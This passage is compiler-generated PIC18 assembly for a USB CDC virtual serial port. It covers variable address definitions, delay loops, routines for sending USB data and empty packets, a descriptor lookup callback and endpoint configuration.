gbl_cdc_tx_start EQU 0x0000024D ; bytes:1
gbl_cdc_tx_end EQU 0x0000024E ; bytes:1
gbl_cdc_rx_buffer EQU 0x000000A0 ; bytes:64
gbl_cdc_rx_start EQU 0x0000024F ; bytes:1
gbl_cdc_rx_end EQU 0x00000250 ; bytes:1
gbl_class_data EQU 0x000001C7 ; bytes:8
gbl_my_device_descriptor EQU 0x00000048 ; bytes:18
gbl_my_config EQU 0x000000EA ; bytes:9
gbl_my_comm_interface EQU 0x000000F3 ; bytes:9
gbl_my_header EQU 0x0000005A ; bytes:5
gbl_my_ACM EQU 0x00000220 ; bytes:4
gbl_my_union EQU 0x000001E4 ; bytes:5
gbl_my_call_mgt EQU 0x000001E9 ; bytes:5
gbl_my_notification_ep EQU 0x000001CF ; bytes:7
gbl_my_data_interface EQU 0x00000196 ; bytes:9
gbl_my_data_out_ep EQU 0x000001D6 ; bytes:7
gbl_my_data_in_ep EQU 0x000001DD ; bytes:7
gbl_complete_serial_config_00000 EQU 0x00000005 ; bytes:67
gbl_string_00 EQU 0x00000224 ; bytes:4
gbl_CDC_USB_status EQU 0x00000251 ; bytes:1
gbl_CDC_USB_Rx_String EQU 0x00000100 ; bytes:64
gbl_old_tris EQU 0x00000252 ; bytes:1
gbl_tris_mask EQU 0x00000253 ; bytes:1
gbl_tris_reg EQU 0x00000236 ; bytes:2
CompGblVar65 EQU 0x00000254 ; bit:0
CompGblVar66 EQU 0x00000254 ; bit:1
FCD_056e1__000AA_1_position EQU 0x00000255 ; bytes:1
FCD_056e1__000AA_1_length EQU 0x00000256 ; bytes:1
Wdt_Delay__00036_arg_delay EQU 0x0000025B ; bytes:1
Wdt_Delay__00036_1_i EQU 0x0000025C ; bytes:1
FCI_GETLEN_0003D_arg_sStr1 EQU 0x00000260 ; bytes:2
FCI_GETLEN_0003D_arg_iStr1_len EQU 0x00000262 ; bytes:1
CompTempVarRet1856 EQU 0x00000264 ; bytes:1
FCI_GETLEN_0003D_1_tmp EQU 0x00000263 ; bytes:1
FC_CAL_PWM_0004E_arg_period EQU 0x00000257 ; bytes:2
FC_CAL_PWM_0004E_arg_prescaler EQU 0x00000259 ; bytes:2
FC_CAL_ADC_0005A_arg_Channel EQU 0x00000259 ; bytes:1
FC_CAL_ADC_0005A_arg_Conv_Speed EQU 0x0000025A ; bytes:1
FC_CAL_ADC_0005A_arg_Vref EQU 0x0000025B ; bytes:1
FC_CAL_ADC_0005A_arg_T_Charge EQU 0x0000025C ; bytes:1
CompTempVar2650 EQU 0x0000025D ; bytes:1
CompTempVar2651 EQU 0x0000025D ; bytes:1
CompTempVar2653 EQU 0x0000025D ; bytes:1
CompTempVar2654 EQU 0x0000025D ; bytes:1
CompTempVar2655 EQU 0x0000025E ; bytes:1
FC_CAL_ADC_0005B_arg_Sample_Mode EQU 0x00000259 ; bytes:1
CompTempVarRet2656 EQU 0x0000025C ; bytes:2
FC_CAL_ADC_0005B_1_iRetVal EQU 0x0000025A ; bytes:2
CompTempVar2659 EQU 0x0000025C ; bytes:1
CompTempVarRet2684 EQU 0x00000259 ; bytes:2
FCD_08f42__0006A_1_FCR_RETVAL EQU 0x00000257 ; bytes:2
CompTempVarRet2708 EQU 0x00000259 ; bytes:2
FCD_08f41__0007B_1_FCR_RETVAL EQU 0x00000257 ; bytes:2
usb_send_d_00084_arg_ep EQU 0x00000272 ; bytes:1
usb_send_d_00084_arg_data EQU 0x00000273 ; bytes:2
usb_send_d_00084_arg_send_count EQU 0x00000275 ; bytes:1
usb_send_d_00084_arg_first EQU 0x00000276 ; bit:0
usb_send_d_00084_1_count EQU 0x00000277 ; bytes:1
usb_send_d_00084_1_bdstat EQU 0x00000278 ; bytes:2
usb_send_d_00084_1_bdcount EQU 0x0000027A ; bytes:2
usb_send_d_00084_1_bdaddr EQU 0x0000027C ; bytes:2
usb_send_d_00084_1_buffer EQU 0x0000027E ; bytes:2
CompTempVar2744 EQU 0x000002A8 ; bytes:1
CompTempVar2748 EQU 0x000002A8 ; bytes:1
CompTempVar2749 EQU 0x000002A8 ; bytes:1
CompTempVar2750 EQU 0x000002A8 ; bytes:1
CompTempVar2751 EQU 0x000002A8 ; bytes:1
CompTempVar2752 EQU 0x000002A8 ; bytes:1
CompTempVar2753 EQU 0x000002A8 ; bytes:1
CompTempVar2754 EQU 0x000002A8 ; bytes:1
CompTempVar2755 EQU 0x000002A8 ; bytes:1
CompTempVar2756 EQU 0x000002A8 ; bytes:1
CompTempVar2759 EQU 0x000002A8 ; bytes:1
CompTempVar2760 EQU 0x000002A9 ; bytes:1
CompTempVar2761 EQU 0x000002A8 ; bytes:1
usb_handle_0008A_arg_data EQU 0x00000267 ; bytes:2
usb_handle_0008A_arg_count EQU 0x00000269 ; bytes:2
usb_handle_0008A_1_my_lc EQU 0x0000026B ; bytes:2
usb_handle_0008B_arg_sdp EQU 0x0000026A ; bytes:8
usb_get_de_0008C_arg_descr_0008D EQU 0x00000274 ; bytes:1
usb_get_de_0008C_arg_descr_0008E EQU 0x00000275 ; bytes:1
usb_get_de_0008C_arg_rtn_d_0008F EQU 0x00000276 ; bytes:2
usb_get_de_0008C_arg_rtn_d_00090 EQU 0x00000278 ; bytes:2
usb_get_de_0008C_1_descrip_00091 EQU 0x0000027A ; bytes:2
usb_get_de_0008C_1_descrip_00092 EQU 0x0000027C ; bytes:2
CompTempVar2773 EQU 0x0000027E ; bytes:1
CompTempVar2774 EQU 0x0000027E ; bytes:1
CompTempVar2775 EQU 0x0000027E ; bytes:1
CompTempVar2776 EQU 0x0000027E ; bytes:1
CompTempVar2777 EQU 0x0000027E ; bytes:1
CompTempVar2778 EQU 0x0000027E ; bytes:1
CompTempVar2779 EQU 0x0000027E ; bytes:1
usb_ep_dat_00093_arg_end_point EQU 0x0000026B ; bytes:1
usb_ep_dat_00093_arg_buffer EQU 0x0000026C ; bytes:2
usb_ep_dat_00093_arg_byte_count EQU 0x0000026E ; bytes:2
usb_ep_dat_00093_1_cdc_rx_next EQU 0x00000270 ; bytes:1
usb_ep_dat_00093_2_count EQU 0x00000271 ; bytes:1
CompTempVar2782 EQU 0x00000272 ; bytes:1
CompTempVar2783 EQU 0x00000273 ; bytes:1
usb_ep_dat_00094_arg_end_point EQU 0x00000268 ; bytes:1
usb_ep_dat_00094_arg_byte_count EQU 0x00000269 ; bytes:2
usb_SOF_ca_00082_arg_frame EQU 0x00000265 ; bytes:2
usb_send_d_00086_1_count EQU 0x00000276 ; bytes:1
CompTempVar2766 EQU 0x00000277 ; bytes:1
usb_send_o_00098_arg_data EQU 0x00000274 ; bytes:1
usb_handle_0009A_arg_sdp EQU 0x0000026A ; bytes:8
usb_handle_0009A_1_descrip_0009B EQU 0x00000272 ; bytes:1
usb_handle_0009A_1_descrip_0009C EQU 0x00000273 ; bytes:1
usb_handle_0007F_1_end_point EQU 0x00000265 ; bytes:1
usb_handle_0007F_1_pid EQU 0x00000266 ; bytes:1
CompTempVar2712 EQU 0x00000267 ; bytes:1
CompTempVar2715 EQU 0x00000267 ; bytes:1
CompTempVar2716 EQU 0x00000268 ; bytes:1
CompTempVar2718 EQU 0x00000269 ; bytes:1
usb_handle_0007F_88_count EQU 0x00000267 ; bytes:1
usb_handle_0007F_97_bdstat EQU 0x00000267 ; bytes:2
usb_handle_0007F_97_bdcount EQU 0x00000269 ; bytes:2
CompTempVar2724 EQU 0x0000026B ; bytes:1
CompTempVar2725 EQU 0x0000026B ; bytes:1
CompTempVar2726 EQU 0x0000026B ; bytes:1
CompTempVar2727 EQU 0x0000026B ; bytes:1
CompTempVar2728 EQU 0x0000026B ; bytes:1
CompTempVar2729 EQU 0x0000026B ; bytes:1
CompTempVar2736 EQU 0x00000270 ; bytes:1
CompTempVar2739 EQU 0x0000026B ; bytes:1
CompTempVar2741 EQU 0x0000026C ; bytes:2
usb_cdc_pu_0009D_arg_c EQU 0x00000261 ; bytes:1
usb_cdc_pu_0009D_1_cdc_tx_next EQU 0x00000262 ; bytes:1
usb_cdc_pu_0009D_1_my_store_gie EQU 0x00000263 ; bit:0
usb_cdc_ha_00095_1_cdc_tx_next EQU 0x0000026B ; bytes:1
usb_cdc_ha_00095_1_count EQU 0x0000026C ; bytes:1
usb_cdc_ha_00095_1_buffer_size EQU 0x0000026D ; bytes:2
usb_cdc_ha_00095_1_buffer EQU 0x0000026F ; bytes:2
usb_cdc_ha_00095_1_bd EQU 0x00000271 ; bytes:2
usb_cdc_ha_00095_1_store_gie EQU 0x00000273 ; bit:0
CompTempVar2789 EQU 0x00000274 ; bytes:1
CompTempVar2790 EQU 0x00000275 ; bytes:1
CompTempVar2791 EQU 0x00000274 ; bytes:1
CompTempVarRet2797 EQU 0x0000025B ; bytes:1
CompTempVarRet2799 EQU 0x00000260 ; bytes:1
usb_cdc_se_000A1_1_my_lc EQU 0x0000025A ; bytes:2
CompTempVar2807 EQU 0x0000025C ; bytes:3
usb_ep_get_000A2_arg_length EQU 0x0000025D ; bytes:1
usb_ep_get_000A2_arg_buffer EQU 0x0000025E ; bytes:2
usb_ep_get_000A2_1_count EQU 0x00000260 ; bytes:1
CompTempVar2810 EQU 0x00000261 ; bytes:1
CompTempVar2811 EQU 0x00000262 ; bytes:1
FCD_056e1__000A4_arg_FCL_DATA EQU 0x00000257 ; bytes:2
FCD_056e1__000A4_arg_FCLsz_DATA EQU 0x00000259 ; bytes:2
CompTempVarRet2812 EQU 0x00000260 ; bytes:1
FCD_056e1__000A4_1_FCL_TIMEOUT EQU 0x0000025B ; bytes:2
FCD_056e1__000A4_1_FCL_LENGTH EQU 0x0000025D ; bytes:1
FCD_056e1__000A4_1_FCR_RETVAL EQU 0x0000025E ; bytes:1
FCD_056e1__000A4_1_n EQU 0x0000025F ; bytes:1
FCD_056e1__000AA_arg_FCL_T_000AB EQU 0x00000257 ; bytes:1
CompTempVarRet2823 EQU 0x0000025B ; bytes:2
FCD_056e1__000AA_1_FCL_WAI_000AC EQU 0x00000258 ; bytes:1
FCD_056e1__000AA_1_FCR_RETVAL EQU 0x00000259 ; bytes:2
CompTempVarRet2826 EQU 0x0000025A ; bytes:1
FCD_056e1__000AD_1_FCL_DEL_000AE EQU 0x00000257 ; bytes:2
FCD_056e1__000AD_1_FCR_RETVAL EQU 0x00000259 ; bytes:1
CompTempVar2828 EQU 0x00000257 ; bytes:1
CompTempVar2830 EQU 0x00000258 ; bytes:1
CompTempVar2836 EQU 0x00000257 ; bytes:1
CompTempVar2838 EQU 0x00000258 ; bytes:1
delay_us_00000_arg_del EQU 0x0000025D ; bytes:1
delay_ms_00000_arg_del EQU 0x0000025D ; bytes:1
usb_send_e_00085_1___retpointvar EQU 0x00000274 ; bytes:1
usb_send_o_00098_1___retpointvar EQU 0x00000275 ; bytes:1
Int1Context EQU 0x00000001 ; bytes:4
ORG 0x00000000
GOTO _startup
ORG 0x00000008
GOTO interrupt
ORG 0x0000000C
delay_us_00000
; { delay_us ; function begin
label1
DECFSZ delay_us_00000_arg_del, F, 1
BRA label1
RETURN
; } delay_us function end
ORG 0x00000012
delay_ms_00000
; { delay_ms ; function begin
MOVF delay_ms_00000_arg_del, F, 1
NOP
BNZ label2
RETURN
label2
MOVLW 0xF9
label3
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
ADDLW 0xFF
BTFSS STATUS,Z
BRA label3
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
DECFSZ delay_ms_00000_arg_del, F, 1
BRA label2
RETURN
; } delay_ms function end
ORG 0x0000004A
usb_send_d_00086
; { usb_send_data_chunk ; function begin
MOVLB 0x02
CLRF usb_send_d_00086_1_count, 1
label4
MOVF gbl_delivery_buffer_size, W, 1
CPFSLT usb_send_d_00086_1_count, 1
BRA label7
MOVF gbl_delivery_bytes_to_send+D'1', W, 1
SUBWF gbl_delivery_bytes_sent+D'1', W, 1
BNZ label5
MOVF gbl_delivery_bytes_to_send, W, 1
SUBWF gbl_delivery_bytes_sent, W, 1
label5
BC label7
MOVF gbl_delivery_bytes_max_send+D'1', W, 1
SUBWF gbl_delivery_bytes_sent+D'1', W, 1
BNZ label6
MOVF gbl_delivery_bytes_max_send, W, 1
SUBWF gbl_delivery_bytes_sent, W, 1
label6
BC label7
MOVF gbl_delivery_ptr+D'1', W, 1
MOVWF FSR0H
MOVF gbl_delivery_ptr, W, 1
MOVWF FSR0L
MOVF INDF0, W
MOVWF CompTempVar2766, 1
MOVF gbl_delivery_buffer+D'1', W, 1
MOVWF FSR0H
MOVF gbl_delivery_buffer, W, 1
ADDWF usb_send_d_00086_1_count, W, 1
MOVWF FSR0L
MOVF CompTempVar2766, W, 1
MOVWF INDF0
INFSNZ gbl_delivery_ptr, F, 1
INCF gbl_delivery_ptr+D'1', F, 1
INFSNZ gbl_delivery_bytes_sent, F, 1
INCF gbl_delivery_bytes_sent+D'1', F, 1
INCF usb_send_d_00086_1_count, F, 1
BRA label4
label7
MOVF gbl_delivery_buffer_size, W, 1
CPFSLT usb_send_d_00086_1_count, 1
BRA label10
MOVF gbl_delivery_bytes_max_send, W, 1
CPFSEQ gbl_delivery_bytes_sent, 1
BRA label8
MOVF gbl_delivery_bytes_max_send+D'1', W, 1
CPFSEQ gbl_delivery_bytes_sent+D'1', 1
BRA label8
BRA label9
label8
MOVF gbl_delivery_bytes_to_send, W, 1
CPFSEQ gbl_delivery_bytes_sent, 1
BRA label10
MOVF gbl_delivery_bytes_to_send+D'1', W, 1
CPFSEQ gbl_delivery_bytes_sent+D'1', 1
BRA label10
label9
MOVLW 0x05
MOVWF gbl_control_mode, 1
label10
MOVF usb_send_d_00086_1_count, W, 1
MOVWF gbl_bd0in+D'1', 1
MOVLW HIGH(gbl_buffer_0_in+D'0')
MOVWF gbl_bd0in+D'3', 1
MOVLW LOW(gbl_buffer_0_in+D'0')
MOVWF gbl_bd0in+D'2', 1
BTFSS gbl_bd0in,6, 1
BRA label11
BCF gbl_bd0in,6, 1
BRA label12
label11
BSF gbl_bd0in,6, 1
label12
BCF gbl_bd0in,5, 1
BCF gbl_bd0in,4, 1
BSF gbl_bd0in,3, 1
BCF gbl_bd0in,2, 1
BCF gbl_bd0in,1, 1
BCF gbl_bd0in,0, 1
BSF gbl_bd0in,7, 1
RETURN
; } usb_send_data_chunk function end
ORG 0x000000DC
usb_stall__00087
; { usb_stall_ep0 ; function begin
MOVLB 0x02
BSF gbl_bd0in,2, 1
BSF gbl_bd0in,7, 1
BSF gbl_bd0out,2, 1
BSF gbl_bd0out,7, 1
RETURN
; } usb_stall_ep0 function end
ORG 0x000000E8
usb_send_o_00098
; { usb_send_one_byte ; function begin
MOVWF usb_send_o_00098_1___retpointvar, 1
MOVLW 0x08
MOVWF gbl_delivery_buffer_size, 1
CLRF gbl_delivery_bytes_sent, 1
CLRF gbl_delivery_bytes_sent+D'1', 1
MOVLW 0x01
MOVWF gbl_delivery_bytes_to_send, 1
CLRF gbl_delivery_bytes_to_send+D'1', 1
CLRF gbl_delivery_bytes_max_send, 1
CLRF gbl_delivery_bytes_max_send+D'1', 1
MOVF usb_send_o_00098_arg_data, W, 1
MOVWF gbl_buffer_byte, 1
MOVLW HIGH(gbl_buffer_byte+D'0')
MOVWF gbl_delivery_ptr+D'1', 1
MOVLW LOW(gbl_buffer_byte+D'0')
MOVWF gbl_delivery_ptr, 1
MOVLW HIGH(gbl_buffer_0_in+D'0')
MOVWF gbl_delivery_buffer+D'1', 1
MOVLW LOW(gbl_buffer_0_in+D'0')
MOVWF gbl_delivery_buffer, 1
BCF gbl_bd0in,6, 1
CALL usb_send_d_00086
BRA label13
; AVOID CODE PAGE BOUNDARY BEGIN - page size:256 words
ORG 0x0118
label13
MOVLW HIGH( label14 )
MOVWF PCLATH
MOVF usb_send_o_00098_1___retpointvar, W, 1
ADDWF PCL, F
; RET_TABLE_BEGIN
label14
; RET_TABLE_ENTRY
GOTO label59
; RET_TABLE_ENTRY
GOTO label61
; RET_TABLE_END
; AVOID CODE BOUNDARY END
; } usb_send_one_byte function end
ORG 0x00000128
usb_send_e_00085
; { usb_send_empty_data_pkt ; function begin
MOVLB 0x02
MOVWF usb_send_e_00085_1___retpointvar, 1
MOVLW 0x08
MOVWF gbl_delivery_buffer_size, 1
MOVLW HIGH(gbl_buffer_0_in+D'0')
MOVWF gbl_delivery_buffer+D'1', 1
MOVLW LOW(gbl_buffer_0_in+D'0')
MOVWF gbl_delivery_buffer, 1
CLRF gbl_delivery_bytes_sent, 1
CLRF gbl_delivery_bytes_sent+D'1', 1
CLRF gbl_delivery_bytes_to_send, 1
CLRF gbl_delivery_bytes_to_send+D'1', 1
CLRF gbl_delivery_bytes_max_send, 1
CLRF gbl_delivery_bytes_max_send+D'1', 1
CLRF gbl_delivery_ptr, 1
CLRF gbl_delivery_ptr+D'1', 1
BCF gbl_bd0in,6, 1
CALL usb_send_d_00086
BRA label15
; AVOID CODE PAGE BOUNDARY BEGIN - page size:256 words
ORG 0x0150
label15
MOVLW HIGH( label16 )
MOVWF PCLATH
MOVF usb_send_e_00085_1___retpointvar, W, 1
ADDWF PCL, F
; RET_TABLE_BEGIN
label16
; RET_TABLE_ENTRY
GOTO label70
; RET_TABLE_ENTRY
GOTO label69
; RET_TABLE_ENTRY
GOTO label55
; RET_TABLE_ENTRY
GOTO label57
; RET_TABLE_END
; AVOID CODE BOUNDARY END
; } usb_send_empty_data_pkt function end
ORG 0x00000168
usb_send_d_00084
; { usb_send_data ; function begin
MOVLB 0x01
LFSR 0x00, gbl_ep_in_buffer_location
MOVF FSR0L, W
MOVLB 0x02
MOVF usb_send_d_00084_arg_ep, W, 1
MOVWF CompTempVar2744, 1
BCF STATUS,C
RLCF CompTempVar2744, W, 1
ADDWF FSR0L, F
MOVF POSTINC0, W
MOVWF usb_send_d_00084_1_buffer, 1
MOVF INDF0, W
MOVWF usb_send_d_00084_1_buffer+D'1', 1
MOVF usb_send_d_00084_arg_ep, F, 1
BZ label18
DECF usb_send_d_00084_arg_ep, W, 1
BZ label19
MOVLW 0x02
CPFSEQ usb_send_d_00084_arg_ep, 1
BRA label17
BRA label20
label17
MOVLW 0x03
CPFSEQ usb_send_d_00084_arg_ep, 1
BRA label22
BRA label21
label18
MOVLW HIGH(gbl_bd0in+D'0')
MOVWF usb_send_d_00084_1_bdstat+D'1', 1
MOVLW LOW(gbl_bd0in+D'0')
MOVWF usb_send_d_00084_1_bdstat, 1
MOVLW HIGH(gbl_bd0in+D'1')
MOVWF usb_send_d_00084_1_bdcount+D'1', 1
MOVLW LOW(gbl_bd0in+D'1')
MOVWF usb_send_d_00084_1_bdcount, 1
MOVLW HIGH(gbl_bd0in+D'2')
MOVWF usb_send_d_00084_1_bdaddr+D'1', 1
MOVLW LOW(gbl_bd0in+D'2')
MOVWF usb_send_d_00084_1_bdaddr, 1
BRA label22
label19
MOVLW HIGH(gbl_bd1in+D'0')
MOVWF CompTempVar2748, 1
MOVLW LOW(gbl_bd1in+D'0')
MOVWF usb_send_d_00084_1_bdstat, 1
MOVF CompTempVar2748, W, 1
MOVWF usb_send_d_00084_1_bdstat+D'1', 1
MOVLW HIGH(gbl_bd1in+D'1')
MOVWF CompTempVar2749, 1
MOVLW LOW(gbl_bd1in+D'1')
MOVWF usb_send_d_00084_1_bdcount, 1
MOVF CompTempVar2749, W, 1
MOVWF usb_send_d_00084_1_bdcount+D'1', 1
MOVLW HIGH(gbl_bd1in+D'2')
MOVWF CompTempVar2750, 1
MOVLW LOW(gbl_bd1in+D'2')
MOVWF usb_send_d_00084_1_bdaddr, 1
MOVF CompTempVar2750, W, 1
MOVWF usb_send_d_00084_1_bdaddr+D'1', 1
BRA label22
label20
MOVLW HIGH(gbl_bd2in+D'0')
MOVWF CompTempVar2751, 1
MOVLW LOW(gbl_bd2in+D'0')
MOVWF usb_send_d_00084_1_bdstat, 1
MOVF CompTempVar2751, W, 1
MOVWF usb_send_d_00084_1_bdstat+D'1', 1
MOVLW HIGH(gbl_bd2in+D'1')
MOVWF CompTempVar2752, 1
MOVLW LOW(gbl_bd2in+D'1')
MOVWF usb_send_d_00084_1_bdcount, 1
MOVF CompTempVar2752, W, 1
MOVWF usb_send_d_00084_1_bdcount+D'1', 1
MOVLW HIGH(gbl_bd2in+D'2')
MOVWF CompTempVar2753, 1
MOVLW LOW(gbl_bd2in+D'2')
MOVWF usb_send_d_00084_1_bdaddr, 1
MOVF CompTempVar2753, W, 1
MOVWF usb_send_d_00084_1_bdaddr+D'1', 1
BRA label22
label21
MOVLW HIGH(gbl_bd3in+D'0')
MOVWF CompTempVar2754, 1
MOVLW LOW(gbl_bd3in+D'0')
MOVWF usb_send_d_00084_1_bdstat, 1
MOVF CompTempVar2754, W, 1
MOVWF usb_send_d_00084_1_bdstat+D'1', 1
MOVLW HIGH(gbl_bd3in+D'1')
MOVWF CompTempVar2755, 1
MOVLW LOW(gbl_bd3in+D'1')
MOVWF usb_send_d_00084_1_bdcount, 1
MOVF CompTempVar2755, W, 1
MOVWF usb_send_d_00084_1_bdcount+D'1', 1
MOVLW HIGH(gbl_bd3in+D'2')
MOVWF CompTempVar2756, 1
MOVLW LOW(gbl_bd3in+D'2')
MOVWF usb_send_d_00084_1_bdaddr, 1
MOVF CompTempVar2756, W, 1
MOVWF usb_send_d_00084_1_bdaddr+D'1', 1
label22
MOVF usb_send_d_00084_1_bdstat+D'1', W, 1
MOVWF FSR0H
MOVF usb_send_d_00084_1_bdstat, W, 1
MOVWF FSR0L
BTFSC INDF0,7
RETURN
CLRF usb_send_d_00084_1_count, 1
label23
MOVF usb_send_d_00084_arg_send_count, W, 1
CPFSLT usb_send_d_00084_1_count, 1
BRA label24
MOVF usb_send_d_00084_arg_data+D'1', W, 1
MOVWF FSR0H
MOVF usb_send_d_00084_arg_data, W, 1
MOVWF FSR0L
MOVF usb_send_d_00084_1_count, W, 1
MOVWF CompTempVar2759, 1
MOVF CompTempVar2759, W, 1
ADDWF FSR0L, F
MOVF INDF0, W
MOVWF CompTempVar2760, 1
MOVF usb_send_d_00084_1_buffer+D'1', W, 1
MOVWF FSR0H
MOVF usb_send_d_00084_1_buffer, W, 1
ADDWF usb_send_d_00084_1_count, W, 1
MOVWF FSR0L
MOVF CompTempVar2760, W, 1
MOVWF INDF0
INCF usb_send_d_00084_1_count, F, 1
BRA label23
label24
MOVF usb_send_d_00084_1_bdcount+D'1', W, 1
MOVWF FSR0H
MOVF usb_send_d_00084_1_bdcount, W, 1
MOVWF FSR0L
MOVF usb_send_d_00084_1_count, W, 1
MOVWF INDF0
MOVF usb_send_d_00084_1_bdaddr+D'1', W, 1
MOVWF FSR0H
MOVF usb_send_d_00084_1_bdaddr, W, 1
MOVWF FSR0L
INCF FSR0L, F
MOVF usb_send_d_00084_1_buffer, W, 1
MOVWF CompTempVar2761, 1
MOVF usb_send_d_00084_1_buffer+D'1', W, 1
MOVWF INDF0
DECF FSR0L, F
MOVF CompTempVar2761, W, 1
MOVWF INDF0
BTFSS usb_send_d_00084_arg_first,0, 1
BRA label25
MOVF usb_send_d_00084_1_bdstat+D'1', W, 1
MOVWF FSR0H
MOVF usb_send_d_00084_1_bdstat, W, 1
MOVWF FSR0L
BCF INDF0,6
label25
MOVF usb_send_d_00084_1_bdstat+D'1', W, 1
MOVWF FSR0H
MOVF usb_send_d_00084_1_bdstat, W, 1
MOVWF FSR0L
BTFSS INDF0,6
BRA label26
MOVF usb_send_d_00084_1_bdstat+D'1', W, 1
MOVWF FSR0H
MOVF usb_send_d_00084_1_bdstat, W, 1
MOVWF FSR0L
BCF INDF0,6
BRA label27
label26
MOVF usb_send_d_00084_1_bdstat+D'1', W, 1
MOVWF FSR0H
MOVF usb_send_d_00084_1_bdstat, W, 1
MOVWF FSR0L
BSF INDF0,6
label27
MOVF usb_send_d_00084_1_bdstat+D'1', W, 1
MOVWF FSR0H
MOVF usb_send_d_00084_1_bdstat, W, 1
MOVWF FSR0L
BCF INDF0,5
BCF INDF0,4
BSF INDF0,3
BCF INDF0,2
BCF INDF0,1
BCF INDF0,0
BSF INDF0,7
RETURN
; } usb_send_data function end
ORG 0x000002CC
usb_get_de_0008C
; { usb_get_descriptor_callback ; function begin
CLRF usb_get_de_0008C_1_descrip_00091, 1
CLRF usb_get_de_0008C_1_descrip_00091+D'1', 1
DECF usb_get_de_0008C_arg_descr_0008D, W, 1
BZ label30
MOVLW 0x02
CPFSEQ usb_get_de_0008C_arg_descr_0008D, 1
BRA label28
BRA label31
label28
MOVLW 0x03
CPFSEQ usb_get_de_0008C_arg_descr_0008D, 1
BRA label29
BRA label32
label29
MOVLW 0x06
CPFSEQ usb_get_de_0008C_arg_descr_0008D, 1
BRA label36
BRA label36
label30
MOVLW HIGH(gbl_my_device_descriptor+D'0')
MOVWF CompTempVar2773, 1
MOVLW LOW(gbl_my_device_descriptor+D'0')
MOVWF usb_get_de_0008C_1_descrip_00091, 1
MOVF CompTempVar2773, W, 1
MOVWF usb_get_de_0008C_1_descrip_00091+D'1', 1
MOVLW 0x12
MOVWF usb_get_de_0008C_1_descrip_00092, 1
CLRF usb_get_de_0008C_1_descrip_00092+D'1', 1
BRA label36
label31
MOVLW HIGH(gbl_complete_serial_config_00000+D'0')
MOVWF CompTempVar2774, 1
MOVLW LOW(gbl_complete_serial_config_00000+D'0')
MOVWF usb_get_de_0008C_1_descrip_00091, 1
MOVF CompTempVar2774, W, 1
MOVWF usb_get_de_0008C_1_descrip_00091+D'1', 1
MOVLW 0x43
MOVWF usb_get_de_0008C_1_descrip_00092, 1
CLRF usb_get_de_0008C_1_descrip_00092+D'1', 1
BRA label36
label32
MOVF usb_get_de_0008C_arg_descr_0008E, F, 1
BZ label33
DECF usb_get_de_0008C_arg_descr_0008E, W, 1
BZ label34
MOVLW 0x02
CPFSEQ usb_get_de_0008C_arg_descr_0008E, 1
BRA label36
BRA label35
label33
MOVLW 0x04
MOVWF usb_get_de_0008C_1_descrip_00092, 1
CLRF usb_get_de_0008C_1_descrip_00092+D'1', 1
MOVLW HIGH(gbl_string_00+D'0')
MOVWF CompTempVar2775, 1
MOVLW LOW(gbl_string_00+D'0')
MOVWF usb_get_de_0008C_1_descrip_00091, 1
MOVF CompTempVar2775, W, 1
MOVWF usb_get_de_0008C_1_descrip_00091+D'1', 1
BRA label36
label34
MOVLW 0x2E
MOVWF usb_get_de_0008C_1_descrip_00092, 1
CLRF usb_get_de_0008C_1_descrip_00092+D'1', 1
MOVLW HIGH(gbl_MX_USBMFR+D'0')
MOVWF CompTempVar2776, 1
MOVLW LOW(gbl_MX_USBMFR+D'0')
MOVWF usb_get_de_0008C_1_descrip_00091, 1
MOVF CompTempVar2776, W, 1
MOVWF usb_get_de_0008C_1_descrip_00091+D'1', 1
BRA label36
label35
MOVLW 0x28
MOVWF usb_get_de_0008C_1_descrip_00092, 1
CLRF usb_get_de_0008C_1_descrip_00092+D'1', 1
MOVLW HIGH(gbl_MX_USBNAME+D'0')
MOVWF CompTempVar2777, 1
MOVLW LOW(gbl_MX_USBNAME+D'0')
MOVWF usb_get_de_0008C_1_descrip_00091, 1
MOVF CompTempVar2777, W, 1
MOVWF usb_get_de_0008C_1_descrip_00091+D'1', 1
label36
MOVF usb_get_de_0008C_arg_rtn_d_0008F+D'1', W, 1
MOVWF FSR0H
MOVF usb_get_de_0008C_arg_rtn_d_0008F, W, 1
MOVWF FSR0L
INCF FSR0L, F
MOVF usb_get_de_0008C_1_descrip_00091, W, 1
MOVWF CompTempVar2778, 1
MOVF usb_get_de_0008C_1_descrip_00091+D'1', W, 1
MOVWF INDF0
DECF FSR0L, F
MOVF CompTempVar2778, W, 1
MOVWF INDF0
MOVF usb_get_de_0008C_arg_rtn_d_00090+D'1', W, 1
MOVWF FSR0H
MOVF usb_get_de_0008C_arg_rtn_d_00090, W, 1
MOVWF FSR0L
INCF FSR0L, F
MOVF usb_get_de_0008C_1_descrip_00092, W, 1
MOVWF CompTempVar2779, 1
MOVF usb_get_de_0008C_1_descrip_00092+D'1', W, 1
MOVWF INDF0
DECF FSR0L, F
MOVF CompTempVar2779, W, 1
MOVWF INDF0
RETURN
; } usb_get_descriptor_callback function end
ORG 0x00000390
usb_device_00096
; { usb_device_configured_callback ; function begin
MOVLW 0x01
MOVLB 0x02
MOVWF gbl_CDC_USB_status, 1
RETURN
; } usb_device_configured_callback function end
ORG 0x00000398
usb_config_00097
; { usb_configure_endpoints ; function begin
MOVLB 0x0F
BSF gbl_uep2,4, 1
BCF gbl_uep2,2, 1
BSF gbl_uep2,1, 1
BSF gbl_uep2,3, 1
MOVLB 0x02
BSF gbl_bd2in,6, 1
BCF gbl_bd2in,5, 1
BCF gbl_bd2in,4, 1
BCF gbl_bd2in,3, 1
BCF gbl_bd2in,2, 1
BCF gbl_bd2in,1, 1
BCF gbl_bd2in,0, 1
BCF gbl_bd2in,7, 1
MOVLB 0x0F
BSF gbl_uep3,4, 1
BSF gbl_uep3,2, 1
BSF gbl_uep3,1, 1
BSF gbl_uep3,3, 1
MOVLB 0x02
BSF gbl_bd3in,6, 1
BCF gbl_bd3in,5, 1
BCF gbl_bd3in,4, 1
BCF gbl_bd3in,3, 1
BCF gbl_bd3in,2, 1
BCF gbl_bd3in,1, 1
BCF gbl_bd3in,0, 1
BCF gbl_bd3in,7, 1
MOVLW 0x08
MOVWF gbl_bd3out+D'1', 1
MOVLW 0x98
MOVWF gbl_bd3out+D'2', 1
MOVLW 0x02
MOVWF gbl_bd3out+D'3', 1
BCF gbl_bd3out,6, 1
BCF gbl_bd3out,5, 1
BCF gbl_bd3out,4, 1
BCF gbl_bd3out,3, 1
BCF gbl_bd3out,2, 1
BCF gbl_bd3out,1, 1
BCF gbl_bd3out,0, 1
BSF gbl_bd3out,7, 1
RETURN
